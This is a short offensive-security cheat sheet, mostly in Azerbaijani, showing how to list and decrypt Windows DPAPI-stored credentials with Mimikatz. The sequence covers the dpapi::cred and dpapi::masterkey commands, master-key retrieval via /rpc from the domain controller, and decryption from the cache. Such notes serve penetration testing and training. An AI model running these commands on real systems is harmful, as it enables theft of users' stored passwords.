List and Decrypt Stored Credentials using Mimikatz
Windows sistemlərində şifrələnmiş etimadnamələr(credentials) əsasən aşağıdakı qovluqlarda saxlanır:
%appdata%\Microsoft\Credentials
%localappdata%\Microsoft\Credentials
DPAPI və ya Data Protection API, Microsoft Windows əməliyyat sistemi tərəfindən təmin edilən təhlükəsizlik xidmətləri toplusudur. Əsasən həssas məlumatları, xüsusən də istifadəçi parolları və şəxsi açarları qorumaq üçün istifadə olunur. DPAPI ilə qorunan etimadnamələr ilə qarşılıqlı əlaqədə olmaq üçün Mimikatz'ın dpapi modulundan istifadə edə bilərik:
#Mimikatz'ın cred funksiyasından istifadə etməklə cred obyekti və onun haqqında məlumat əldə edə bilərik:
dpapi::cred /in:"%appdata%\Microsoft\Credentials\<CredHash>"
#Əvvəlki əmrdən əldə edilən "guidMasterKey" parametri bizə etimadnaməni şifrələmək üçün hansı masterkeydən istifadə olunduğunu deyir.
#MasterKey'i enumerate edək:
dpapi::masterkey /in:"%appdata%\Microsoft\Protect\<usersid>\<MasterKeyGUID>"
#Etimadnamənin aid olduğu istifadəçinin (və ya sistemin) kontekstindəyiksə, master açarın deşifrəsini domen nəzarətçisinə ötürmək üçün /rpc bayrağından istifadə edə bilərik:
dpapi::masterkey /in:"%appdata%\Microsoft\Protect\<usersid>\<MasterKeyGUID>" /rpc
#İndi bizim yerli keşimizdə masterkey'imiz var:
dpapi::cache
#Keşlənmiş masterkey'dən istifadə edərək etimadnamənin(credential) şifrəsini aça bilərik:
dpapi::cred /in:"%appdata%\Microsoft\Credentials\<CredHash>"
